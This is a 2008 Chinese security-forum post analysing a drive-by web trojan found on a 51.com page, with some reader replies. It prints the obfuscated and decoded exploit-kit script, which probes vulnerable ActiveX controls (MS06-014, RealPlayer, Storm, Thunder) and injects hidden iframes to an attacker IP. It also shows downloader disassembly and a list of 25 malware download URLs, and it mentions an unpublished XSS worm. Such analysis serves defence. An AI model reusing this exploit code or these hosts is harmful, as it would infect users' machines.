[原创]分析51.com的木马和AJAX蠕虫初探(页 1) - 论坛原创{ Original Paper } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

混世魔王 2008-5-13 15:36

[原创]分析51.com的木马和AJAX蠕虫初探

文章作者：混世魔王
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

无意发现51某个空间有木马,就分析了一下。[code]
<html>
<title></title>
<table border="0" cellspacing="0" cellpadding="0"  align="center" height=160>
<tr><td  >
<b>出错了你访问的页面并不存在</b>
</td></tr>
</table>
<br><br><br>
<center>
<form name=loading>
<p><font color="7285CF">正在为你载入，请稍候.......</font></p>
<p>
<input type=text name=chart size=46 style="font-family:Arial; font-weight:bolder; color:7285CF; background-color:white; padding:0px; border-style:none;">
<br>
<input type=text name=percent size=46 style="font-family:Arial; color:FF0000; text-align:center; border-width:medium; border-style:none;">
<script>var bar = 0
var line = "||"
var amount ="||"
count()
function count(){
bar= bar+2
amount =amount + line
document.loading.chart.value=amount
document.loading.percent.value=bar+"%"
if (bar<100)
{setTimeout("count()",20);}
else
{window.location = "http://www.55py.com/";}
}
</script>
</p>
</form>
</html>
<iframe src=http://60.190.118.233/4.htm width=97 height=0 frameborder=0></iframe>
<iframe src=http://60.190.118.233/4.htm width=100 height=0 frameborder=0></iframe>
<iframe src=http://60.190.118.233/4.htm width=100 height=0 frameborder=0></iframe>
[/code]接下来,看看4.htm的内容[code]
<iframe src=http://60.190.118.233/ai/index.htm width=100 height=0></iframe>
<script src='http://s35.cnzz.com/stat.php?id=876890&web_id=876890' language='JavaScript' charset='gb2312'></script>
<script src='http://s141.cnzz.com/stat.php?id=854550&web_id=854550' language='JavaScript' charset='gb2312'></script>
<HTML><BODY>
[/code]2个站长统计.继续./ai/index.htm 的内容[code]
<script>window.onerror=function(){return true;}</script>
<Script Language="JScript.Encode">#@~^6goAAA==@#@&d-mD,mWK3,xPr/rVxOAsJi@#@&d@#@&d6;UmDkKx~/nO;WG3bn` lhnBP\Cs!+SPaak.#,@#@&i ,~P@#@&7dSkU[KhR9Gm!:+ O mKW0knPx~ lh+,QPr'E~3P+d^mwn`7C^En*P3P`v+X2kM+~'{PU;^V#,_PrJP=~cJpP62k.nk'EP3~+Xwr.RYG!tKjYMr oc*#*i@#@&d)@#@&@#@&70!x^ObWx,L+DZWKVr+v1m:n#~@#@&d`P,~@#@&d7-mDPdnmD^t,x,1Cs+,_Pr'rI@#@&d7k6PcAbxNKAR9Wm!hnxDR1WG3rncVnxTOt,@*~T*P@#@&7i ~@#@&7idG60k+Y,',Ak NGhcNG^!:+ OR1WW0rnRbx9+arWck+CD14#p@#@&7idkW~vWW0knDPZ{P F#,@#@&7di ~@#@&d77iW06d+DP_{~d+mD1t VnUTY4i,~P,P~~@#@&d77,Pnx9~{PAbx9WhcNK^Es+UYcmGG0k+crx9+6}WcJpJBPG0WdYbP,~P,P~@#@&dd7~,kWPvn N~{',OF*@#@&7diP~P,+U[,'PSrx9Whc[Gm!:xOR^GK3r+cs+ oO4p@#@&77iP~DO!DU,E +/1lan`SkUNKh [KmEsnxDRmKGVkRkE8/O.bxL`KW0k+OS,+x[b*i@#@&i7iPN@#@&idP)@#@&7P,DnY!DU~ EV^I@#@&d8@#@&@#@&i0!x^YrG P.+Tr/D+.c l:nb,@#@&dP@#@&d77lMPYKNmzP{PU+SP9CD+`*I@#@&dd7C.P6ak.+d~{PU+S~fmYnc*i@#@&7i+awb./ k+DKks+vOW9lzRT+OPb:+vbP3PFZTTe+!CvTe+**i@#@&i7/Y/GK3knc1WG3B~ lh~,+6akMn/*i@#@&i8@#@&@#@&d6;x1YkKU~Wa+ \`b~@#@&7 @#@&di\C.,mPx~T+OZKG0knvmKW3*i@#@&dikWPvm~Z{Px!sV*P@#@&77 @#@&iP~d.nDE.xp@#@&idN@#@&dd@#@&id.+TrkYnM`1WW0#p@#@&id@#@&idAr NWS N0l!sO?DlDEd'E完成Ep@#@&di7@#@&d7OMX ~-mD~+p@#@&d7i\mDPmNKx`9W^Es+UOcmDCY2VhnxD`rW8Ln^DJb#p@#@&id7C9WRdnDbOYMr(EO`rmVm/krNr~Em^/r[=AfOZl*v Xb2O8F9!R1R&)OZTZZco/y,2fr#I@#@&7id-mD,l/{l9GR1DnlD+G8N+mDcJzNW98 ?DDlhJSEr#N@#@&7d1lO^4`+b`)i@#@&i76kUmV^X @#@&i7db0c+e'E,K4L^Y,2DMG.Tr#P@#@&d77iNGm!h+ Y AMkYncr@!r0MCs+~Sk9Yt{*Z~tkLtD'T~kDm{qcctYs@*@!zb0Mlh+@*E*8@#@&i7dVdn@#@&d77Pd@#@&i7idOMXPP\mD,%i@#@&7did7-mDPMnl^FF{Unh,b1Yr\np}4%+1O`rq3]hJ_E/DV qrQr2]hZDVR8J*I8@#@&7did^CDmtv%#P8i@#@&7did6kUlssH r0v%"{J,G(L+^O,2.DK.YJbPk6`xh,)mDk-+or8%mYvEqAIn;OsR&2"n/Ys 8JbRhslH+.KMWwn.DXcJh]}fi;Kj2IUq}HJ*@!xJ+RT 8cRlX r#@#@&~~P,P,P~P~~,P~P,~P,P~~,PP~~,P~P,~,P~,P,P 9W1;:xORSDrO`B@!r0Ml:~Ak9Y4'q!~4kLtDx!,/.^{DV 4D:@*@!Jr6DCs+@*B#)@#@&~P,P~P,P~~,PP,~P,PP,~~P,PVd+@#@&,P~P,~P,P~~,PP~~,P~P,~,P~P@#@&ddidi[W1Eh+ Y AMkYcB@!k0MCh+,hbNOtxqZP4+bLtD'T~kDmxUh tDh@*@!&b0Ml:@*Eb8)8@#@&@#@&77idYMz ,\lM~Li@#@&id7d7-mD~o^AWMV[x +h~)1Yr\p}4%mD`JVS&3fKhUR&29GSxR8E#p8@#@&77dimmY^tcL* Ni@#@&did7WbxlssH r0vLe'E]W(L+1Y,3DMW.Tr#`@#@&ddi7d9Wm!hnxDRSDrYncE@!r0MC:PdOHV+x[b/2Vmz=xG +,/D1'^"R4Yh@*@!zrWMl:@*B*88@#@&@#@&ididODz`,\CD,4i@#@&77idd-CMPdYK.s'Uh,bmDk7n(}4%+1YcEtn?cjYKD:hsCXDcFE#IN@#@&7di7mmY^4vt#`Np@#@&di7i0r l^VXPk6cte'E$K4%n1YPA.DKDTrb`@#@&did7d[G1Eh+ ORSDrO`B@!r6DC:~kYz^+{Nkkw^CX=xGxPd.1'46 tD:@*@!&r0Mls+@*BbN)@#@&@#@&7didO.H P-CMPWi@#@&id7id7lD,Y4;x9+.' +A~zmYb-+or4Nn^YvJGn/Vrn Y .K[J*iN@#@&dd771lOm4c6#`)i@#@&didiWk lsVH ~r6`0exJ]W4Nn^Y,2MDGDDE* @#@&i7did[G1E:nUDRADbO`v@!k6Dls+,Ak9Y4'l!~4ko4O'ZP/M^x6^R4Yh@*@!&b0.lsn@*E#NN@#@&@#@&7id7k6c6'xr$K4LmD~2MDGDYJ~'LPo{xJ]W4Nn^Y,2MDGDDE,['P4x'r$G8N+mO~AD.WMDrP'LPN''r$K8LmOPAD.GMTJ*@#@&iddi`sW1lDkGx .wsl1n`rl8G!Y)8smxVJ*I)@#@&idi88@#@&iN@#@&@#@&Wa+U t`#p@#@&r+YCAA==^#~@</script>
</BODY></HTML>
[/code]看JS<Script Language="JScript.Encode"> 用的是JS的Encode加密,找个解密的.[code]
<script>window.onerror=function(){return true;}</script>
<Script Language="JScript">
var cook = "silentwm";

function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}

function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
   end = window.document.cookie.indexOf(";", offset)
   if (end == -1)
      end = window.document.cookie.length;
   return unescape(window.document.cookie.substring(offset, end));
   }
   }
   return null;
}

function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}

function openWM()
{
var c = getCookie(cook);
if (c != null)
{
      return;
}

register(cook);

window.defaultStatus="完成";

try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<iframe width=50 height=0 src=14.htm></iframe>")}
else  //MS06014漏洞
{
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
                                    {document.write('<iframe width=10 height=0 src=rl.htm></iframe>')}//RealPlay漏洞
                     else
                     {
document.write('<iframe width=10 height=0 src=new.htm></iframe>')}}}

try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=lz.htm></iframe>')}}

try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=bf.htm></iframe>')}}
                              //暴风影音漏洞
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe width=50 height=0 src=xl.htm></iframe>')}}
                              //迅雷漏洞
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && j=="[object Error]")
{location.replace("about:blank");}
}}
}

openWM();
</script>
[/code]网马 06014 ,暴风,迅雷,Real
木马地址:[code]
http://60.190.118.233/8/x.exe
[/code]UPX壳[code]
004022F2 6A 70          push 70 //OEP
004022F4 68 18314000    push 00403118
004022F9 E8 CA020000    call 004025C8
004022FE 33DB          xor    ebx, ebx
[/code]Microsoft Visual C++ 7.0 Method2[code]
0040211C 68 F4404000    push 004040F4                      ; httpaddurl
00402121 57             push edi
00402122 FFD6          call esi
00402124 68 E8404000    push 004040E8                      ; inithttp
00402129 57             push edi
0040212A A3 00554000    mov    dword ptr [405500], eax
0040212F FFD6          call esi
00402131 68 DC404000    push 004040DC                      ; readhttp
00402136 57             push edi
00402137 A3 04554000    mov    dword ptr [405504], eax
0040213C FFD6          call esi
0040213E 833D 04554000 0>cmp    dword ptr [405504], 0
00402145 A3 08554000    mov    dword ptr [405508], eax
0040214A 5E             pop    esi
[/code]一个下载者,访问b.txt 文件,挖哈哈,25个文件地址....[code]
GET /8/b.txt HTTP/1.1
Host: 60.190.118.233
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; XP)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

HTTP/1.1 200 OK
Content-Length: 989
Content-Type: text/plain
Last-Modified: Mon, 12 May 2008 19:17:37 GMT
Accept-Ranges: bytes
ETag: "f24d28d764b4c81:743"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 13 May 2008 05:30:57 GMT
Connection: close

ver=1
Url1=http://dl.ssl790.cn/cao/aa1.exe
Url2=http://dl.ssl790.cn/cao/aa2.exe
Url3=http://dl.ssl790.cn/cao/aa3.exe
Url4=http://dl.ssl790.cn/cao/aa4.exe
Url5=http://dl.ssl790.cn/cao/aa5.exe
Url6=http://dl.ssl790.cn/cao/aa6.exe
Url7=http://dl.ssl790.cn/cao/aa7.exe
Url8=http://dl.ssl790.cn/cao/aa8.exe
Url9=http://cw.ssl790.cn/cao/aa9.exe
Url10=http://cw.ssl790.cn/cao/aa10.exe
Url11=http://cw.ssl790.cn/cao/aa11.exe
Url12=http://cw.ssl790.cn/cao/aa12.exe
Url13=http://cw.ssl790.cn/cao/aa13.exe
Url14=http://cw.ssl790.cn/cao/aa14.exe
Url15=http://cw.ssl790.cn/cao/aa15.exe
Url16=http://cw.ssl790.cn/cao/aa16.exe
Url17=http://ta.ssl790.cn/cao/aa17.exe
Url18=http://ta.ssl790.cn/cao/aa18.exe
Url19=http://ta.ssl790.cn/cao/aa19.exe
Url20=http://ta.ssl790.cn/cao/aa20.exe
Url21=http://ta.ssl790.cn/cao/aa21.exe
Url22=http://ta.ssl790.cn/cao/aa22.exe
Url23=http://ta.ssl790.cn/cao/aa23.exe
Url24=http://ta.ssl790.cn/cao/aa24.exe
Url25=http://ta.ssl790.cn/cao/aa25.exe
[/code]木马还免杀的...举报人.BY 混世魔王
接下来,搞51.com的AJAX蠕虫,他对flash文件没有任何过滤.现在还属于危险期间,就不公布病毒代码了,其他的就自己发挥了...
效果还比较猛...现在
访问的人气指数:395318点
留言评论:11921条

[[i] 本帖最后由 eviloctal 于 2008-5-13 16:03 编辑 [/i]]

remax 2008-5-13 19:28

魔王重出江湖了///

你就算不公布代码

大家去51随便挖挖不就有了？

xss worm这东西一但放出来传播速度绝对的快

dayang1718 2008-5-14 15:01

老大出马，必是精品，只是关键东西没发出来。Encode解密,不知道怎么搞，虽然有很多的在线解密，怎么还是一堆乱码！

haggy 2008-5-15 22:31

JS的Encode怎么解密呢想知道

坏苹果 2008-5-17 13:50

病毒分析一般要用什么工具？

[[i] 本帖最后由坏苹果于 2008-5-17 14:04 编辑 [/i]]

xiaocool 2008-5-17 20:29

我对后面的ajax比较感兴趣

kinlin 2008-7-2 02:18

抓包分析的数据

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

[原创]分析51.com的木马和AJAX蠕虫初探